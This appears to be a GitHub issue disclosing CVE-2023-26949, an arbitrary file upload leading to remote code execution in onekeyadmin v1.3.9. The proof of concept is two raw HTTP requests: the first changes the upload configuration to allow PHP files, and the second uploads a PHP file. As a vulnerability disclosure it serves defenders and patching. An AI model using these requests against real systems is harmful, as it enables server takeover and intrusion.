Headline
CVE-2023-26949: Remote code execution caused by uploading arbitrary files in the background · Issue #1 · keheying/onekeyadmin
An arbitrary file upload vulnerability in the component /admin1/config/update of onekeyadmin v1.3.9 allows attackers to execute arbitrary code via a crafted PHP file.
Vulnerability affects product:onekeyadmin
Vulnerability affects version 1.3.9
Vulnerability type:Remote code execution
Vulnerability Details:
Remote code execution caused by uploading arbitrary files in the background
Vulnerability location
Vulnerability occurs in
app\admin\controller\File#upload Although there are restrictions on ext
but we found
The app\admin\controller\Config#update method can update the limit
Vulnerability recurrence
Conditions Admin
poc
The first step is to update the configuration to allow uploading php files
`POST /admin1/config/update HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 398
Accept: /
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/config/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: .AspNetCore.Antiforgery.WE9Ryc20IQg=CfDJ8HxjCh0oOylDk40Utlg0kuUFWVLtvNW_C4pGl8LD435wIbnnMrZdOHOVRm58Tf9ea-RLT8Cp1rFj-RWlZ5XrTw9-pVKvbqtZLLUaL1326gsyfJyfQ4k6KDwnwVkIpwADhj_KGa_UpcDu8IqL7EsVtWw; .AspNetCore.Session=CfDJ8HxjCh0oOylDk40Utlg0kuXb68MZjsW%2FxifhC6RHBoXE9qf6bZAULAztKWrxdQ9IBGV%2FMomSXYW%2BGJr9gVN1G67kZ5ZHUvzZTEMIYQoRouYf9upg6F4i%2BhutGrGde7h3SIdWEXSN5b50ouWrN9AG8MmS%2FGz8y0InZBJWSgEn5O55; .AspNetCore.Cookies=CfDJ8HxjCh0oOylDk40Utlg0kuXw6Bar2FloCPnRmIK8z27i1l1eQZE9H20ZfZqx9xSA5gVSrZS5hfpqeu4tILEhHunDaAOIqfEmmxsRNV2SMHnwXt_-X0kdVf67A8e1MWMxP-p-tuJZSsa7zVQwOFqTVBFHpgk2dGT3N2U0Th0WR3lQUMdM42wC-XbWYchKNG_fiMCNOPg2MXOFaBmuPreHzuI2wxc-a8KiA7afrdzzz4BnurbEbl8aR8DL0WYq8jFHxZdo1RwJwXULO2qvHYIQzgjZvELBShr4j8C6FJ82VBL5Gq3zFSHAJZ0ddy2q9M0cLUVM4alP8kmxfwfeaVHMZR1cS3_WwDQz5hvGNQuVwIijYdb4HUUpYTKZh2hs_j-o0joMSDe7mdS_3rTvyQ5errD_GkyZZnZL7qZ2jydHhlZMa2vPLOHmLFan6WXhtTk0E_1-zYB117H7tFTA_jJGaNrPVYEuQmmSuBf3kwlWwV1TfGQYL7dPbZDscJdMhn34YnL3LvBlWmY6wRO1ZkZrLmRSsIzcWL7PKHaELAXf8VHz; PHPSESSID=c54fdf181caff75fbd613da826c6e9ae
Connection: close
{"title":"涓婁紶闄愬埗","name":"upload","value":{"admin":{"ext":{"image":"png,jpg,jpeg,bmp,gif,ico","video":"mp4","audio":"mp3","word":"docx,doc","other":"swf,psd,css,js,html,exe,dll,zip,rar,ppt,pdf,xlsx,xls,txt,torrent,dwt,sql,svg,php"},"size":{"image":10485760,"video":104857600,"audio":104857600,"other":104857600,"word":104857600}},"index":{"ext":{"image":"png,jpg"},"size":{"image":2097152}}}}<img width="980" alt="image" src="https://user-images.githubusercontent.com/122217858/211447647-7117f5e5-30ef-4b7e-a730-02e0c5862a2d.png"> The second step is to upload malicious filesPOST /admin1/file/upload HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 280
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryARP8fRC2kb4GP3oP
Accept: /
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/file/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:PHPSESSID=c54fdf181caff75fbd613da826c6e9ae
Connection: close
------WebKitFormBoundaryARP8fRC2kb4GP3oP
Content-Disposition: form-data; name="name"
templatex
------WebKitFormBoundaryARP8fRC2kb4GP3oP
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: text/php
------WebKitFormBoundaryARP8fRC2kb4GP3oP–
`